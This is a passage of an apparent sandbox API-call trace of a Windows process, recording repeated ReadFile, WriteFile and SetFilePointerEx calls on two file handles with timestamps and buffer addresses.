lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.767] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.767] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.768] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.768] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: 